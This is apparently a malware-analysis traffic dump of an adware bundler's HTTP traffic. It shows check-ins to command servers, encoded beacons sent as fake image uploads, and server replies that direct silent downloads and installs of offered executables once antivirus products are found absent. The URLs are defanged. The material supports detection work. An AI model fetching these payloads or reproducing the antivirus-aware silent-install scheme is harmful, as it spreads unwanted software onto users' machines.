Content-Type: text/html
Content-Length: 36
Server: AmazonS3
<html>..<body>..ok..</body>..</html>
GET /amm/apps/121/10100019/loader.js?x=1&cb=1441686142118&yt=81 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s10100019.xcodelib.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/javascript
Content-Length: 659
Connection: keep-alive
Date: Mon, 07 Sep 2015 17:27:48 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=86400
Expires: Tue, 08 Sep 2015 17:27:48 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Age: 39613
X-Cache: Hit from cloudfront
Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Ng373yrQ3DmckHn6wgZrGPIL6wiJlN7MvCp7qVNKrO2z7u3L0DNivw==
<<< skipped >>>
POST /DSS_Unq_IMapplication_mon_remote.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.stsunsetwest.com
Content-Length: 281
Connection: Keep-Alive
Cache-Control: no-cache
from=nsis&type=Reg&mode=checker&utid=194.242.96.218_2015-09-08_00:22:25&pubid=15690&CbId=10656&BundleVersionID=IM_240914@01&subid=&mid=qGKynuZ0mulJUhgaWZBaX8M7O6jfLzmQ&DB=IE&arc=32&skexist=NO&avsexist=NO&advDetails=12~YES~0/419~NO~4/422~YES~0/432~NO~15/460~YES~0/575~NO~4/576~NO~4/
HTTP/1.1 200 OK
Date: Tue, 08 Sep 2015 04:22:26 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 611
Connection: close
Content-Type: text/html; charset=UTF-8
422~hXXp://secured.nmsgv.us/os/rm/OfferScreen_422.zip~hXXp://VVV.djapp.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01#12~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0..422#RE3|mystartsearchSoftware\mystartsearchhp#RCMD|-pub_id=314 -adv_id=76#SLP|30^6#PKG|NO#INT|Mntz_Installer.exe..12#RE2|Systweak\RegClean Pro\Version 6.1#RCMD|/verysilent#SLP|10^3#FNV|WriteINI^hXXp://dl.ourinputinfonet.com/monti/llyun/hd/setup.exe#PKG|NO#INT|rcpsetup_17970.exe..
POST /rp/v/image.jpg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: cdn.austries.com
Content-Length: 286
Connection: Keep-Alive
key=jZKJflaCh4yNeoWFeIyNeouNP3p/f2J9VkpJSklJSUpSP4mOe2J9VkpJSkk/eomJYn1WSktKP3qAj36LVkpHSkdJR0xKP4COgn1WlFBPTVBeX01ORl9NWlxGTUlbXEZSXV1eRkpaXE5dTEtRTk9OXEZLSUpOeElSeElRlj+GenxWSUlJXEtSX11OTlpdP32Mi1aHiId+P4mAfVaHiId+P3uCfVZJP3uOgn1WSklJP4+GVks/fHtWSk1NSk9RT0pMSg==&x=1
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-type: image/gif
Date: Tue, 08 Sep 2015 04:22:08 GMT
Server: Google Frontend
Content-Length: 43
GIF89a.............!.......,...........D..;....
POST /rp/v/image.jpg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: cdn.austries.com
Content-Length: 388
Connection: Keep-Alive
key=jZKJflaCh4yNeoWFP3p/f2J9VkpJSklJSUpSP4mOe2J9VkpJSkk/eomJYn1WSktKP3qAj36LVkpHSkdJR0xKP4COgn1WlFBPTVBeX01ORl9NWlxGTUlbXEZSXV1eRkpaXE5dTEtRTk9OXEZLSUpOeElSeElRlj+IjFZxaUxLP4Z6h45WYoeNfoU5XIiLiYiLeo2CiId4eHhvZpB6i35FOWKHfEc/f39WP3yBVj+CflZPR0lHS1JJSUdOTkpLP4Z6fFZJSUlcS1JfXU5OWl0/fYyLVoeIh34/iYB9VoeIh34/e4J9Vkk/e46CfVZKSUk/j4ZWSz+QhI2GVkpNP3x7VkpNTUpPUU9KTEo=&x=1
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-type: image/gif
Date: Tue, 08 Sep 2015 04:22:08 GMT
Server: Google Frontend
Content-Length: 43
GIF89a.............!.......,...........D..;
POST /rp/v/image.jpg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: cdn.austries.com
Content-Length: 404
Connection: Keep-Alive
key=jZKJflaCh4yNeoWFeHqLjHw/en9/Yn1WSklKSUlJSlI/iY57Yn1WSklKST96iYlifVZKS0o/eoCPfotWSkdKR0lHTEo/gI6CfVaUUE9NUF5fTU5GX01aXEZNSVtcRlJdXV5GSlpcTl1MS1FOT05cRktJSk54SVJ4SVGWP4iMVnFpTEs/hnqHjlZih41+hTlciIuJiIt6jYKIh3h4eG9mkHqLfkU5Yod8Rz9/f1Y/fIFWP4J+Vk9HSUdLUklJR05OSks/hnp8VklJSVxLUl9dTk5aXT99jItWh4iHfj+JgH1Wh4iHfj97gn1WST97joJ9VkpJST+PhlZLP5CEjYZWSk0/fHtWSk1NSk9RT0pMUA==&x=1
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-type: image/gif
Date: Tue, 08 Sep 2015 04:22:14 GMT
Server: Google Frontend
Content-Length: 43
GIF89a.............!.......,...........D..;....
POST /rp/v/image.jpg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: cdn.austries.com
Content-Length: 394
Connection: Keep-Alive
key=jZKJflaCh4yNeoWFeH6HfT96f39ifVZKSUpJSUlKUj+JjntifVZKSUpJP3qJiWJ9VkpLSj96gI9+i1ZKR0pHSUdMSj+AjoJ9VpRQT01QXl9NTkZfTVpcRk1JW1xGUl1dXkZKWlxOXUxLUU5PTlxGS0lKTnhJUnhJUZY/iIxWcWlMSz+GeoeOVmKHjX6FOVyIi4mIi3qNgoiHeHh4b2aQeot+RTlih3xHP39/Vj98gVY/gn5WT0dJR0tSSUlHTk5KSz+GenxWSUlJXEtSX11OTlpdP32Mi1aHiId+P4mAfVaHiId+P3uCfVZJP3uOgn1WSklJP4+GVks/kISNhlZKTT98e1ZKTU1KT1FPSkxR&x=1
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-type: image/gif
Date: Tue, 08 Sep 2015 04:22:14 GMT
Server: Google Frontend
Content-Length: 43
GIF89a.............!.......,...........D..;
GET /os/rm/OfferScreen_422.zip HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: secured.nmsgv.us
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 08 Sep 2015 04:22:26 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1426709167"
Last-Modified: Wed, 18 Mar 2015 20:06:07 GMT
Cache-Control: max-age=32746
Content-Length: 7218
Content-Type: application/zip
X-HW: 1441686147.dop009.fr7.t,1441686146.cds009.fr7.c
<<< skipped >>>
GET /os/rm/OfferScreen_12_HD.zip HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: secured.nmsgv.us
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 08 Sep 2015 04:22:26 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1411022125"
Last-Modified: Thu, 18 Sep 2014 06:35:25 GMT
Cache-Control: max-age=32746
Content-Length: 10048
Content-Type: application/zip
X-HW: 1441686147.dop010.fr7.t,1441686146.cds037.fr7.c
<<< skipped >>>
POST /rp/v/image.jpg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: cdn.austries.com
Content-Length: 436
Connection: Keep-Alive
key=jZKJflZ6fI2Cj34/fIeNVkk/iYuPjYZWSUp4SUp4SUt4SUl4SUk/fYVWTD96f39ifVZKSUpJSUlKUj+JjntifVZKSUpJP3qJiWJ9VkpLSj96gI9+i1ZKR0pHSUdMSj+AjoJ9VpRQT01QXl9NTkZfTVpcRk1JW1xGUl1dXkZKWlxOXUxLUU5PTlxGS0lKTnhJUnhJUZY/iIxWcWlMSz+GeoeOVmKHjX6FOVyIi4mIi3qNgoiHeHh4b2aQeot+RTlih3xHP39/Vj98gVY/gn5WT0dJR0tSSUlHTk5KSz+GenxWSUlJXEtSX11OTlpdP32Mi1aHiId+P4mAfVaHiId+P3uCfVZJP3uOgn1WSklJP4+GVks/kISNhlZKTT98e1ZKTU1KT1FPSk1P&x=1
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-type: image/gif
Date: Tue, 08 Sep 2015 04:22:23 GMT
Server: Google Frontend
Content-Length: 43
GIF89a.............!.......,...........D..;
GET /client-cmd/cr.html?type=install&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686132 HTTP/1.1
Host: s3.zawss.info
Connection: Keep-Alive
HTTP/1.1 200 OK
x-amz-id-2: IDc8l YobxREKOQZRwpLsJAxlqUxwch52hitKwNL8iYdO7OiyAnHIWIoOFtAfpn1TIXHaDs39jk=
x-amz-request-id: 5CA84AF807EBB1C3
Date: Tue, 08 Sep 2015 04:22:09 GMT
Last-Modified: Tue, 28 Apr 2015 16:05:06 GMT
ETag: "d152c08a253fe1bd8ede751d571ac800"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 36
Server: AmazonS3
<html>..<body>..ok..</body>..</html>
POST /FCL_Co_Unq_remote_v5.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.fcesneim.us
Content-Length: 107
Connection: Keep-Alive
Cache-Control: no-cache
from=nsis&type=Reg&pubid=15690&CbId=10656&BundleVersionID=IM_240914@01&mid=qGKynuZ0mulJUhgaWZBaX8M7O6jfLzmQ
HTTP/1.1 200 OK
Date: Tue, 08 Sep 2015 04:22:25 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 1870
Connection: close
Content-Type: text/html; charset=UTF-8
hXXp://VVV.stsunsetwest.com/DSS_Unq_IMapplication_mon_remote.php..http://VVV.stsunsetwest.com/DS_Unq_trackstats_mon.php..UA..hXXp://VVV.stsunsetwest.com/DS_AdvAffiliateId.php..194.242.96.218_2015-09-08_00:22:25..NULL..12#RE2|Systweak\RegClean Pro\Version 6.1..419#O|V^0*S^0*E^0*EV1^0*T^0,B1|C*F*I,F1|Mail.Ru\MailRuUpdater.exe,F1|Amigo\Application\amigo.exe,RE2|Amigo,RR2|IM^330,RE3|Clients\StartMenuInternet\amigo.exe,RE3|Microsoft\MediaPlayer\ShimInclusionList\amigo.exe,RE3|Microsoft\Windows\CurrentVersion\App Paths\amigo.exe..422#D|2A^0,RE3|webssearchesSoftware\webssearcheshp,RE3|qone8Software\qone8hp,RE3|awesomehpSoftware\awesomehphp,RE3|aartemisSoftware\aartemishp,RE3|sweet-pageSoftware\sweet-pagehp,RE3|omiga-plusSoftware\omiga-plushp,RE3|vi-viewSoftware\vi-viewhp,RE3|istartsurfSoftware\istartsurfhp,RE3|mystartsearchSoftware\mystartsearchhp,RE3|AVAST Software,RE3|AVAST,RE3|Microsoft\Windows\CurrentVersion\Uninstall\avast..432#B1|F,RE3|SiteSee,RE3|AVAST Software,RE3|AVAST,RE3|Microsoft\Windows\CurrentVersion\Uninstall\avast,RE3|ZoomWebLists..460#RE2|InstalledBrowserExtensions\32846,RE2|ESET,RE2|Malwarebytes' Anti-Malware,RE2|Malwarebytes,RE2|Avira,RE2|Fortinet\FortiClient,RE2|AVG,RE3|AVAST Software,RE3|AVAST,RE3|Microsoft\Windows\CurrentVersion\Uninstall\avast,RE3|VIPRE Antivirus,RE3|ESET,RE3|Malwarebytes' Anti-Malware,RE3|Avira,RE3|KasperskyLab,RE3|Norton,RE3|Fortinet\FortiClient,RE3|AVG,RE3S|Avira..575#O|V^0*S^0*E^0*EV1^0*T^0,B1|I,ER|HKLM^Software\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Softwa
<<< skipped >>>
The Trojan connects to the servers at the following location(s):
Strings from Dumps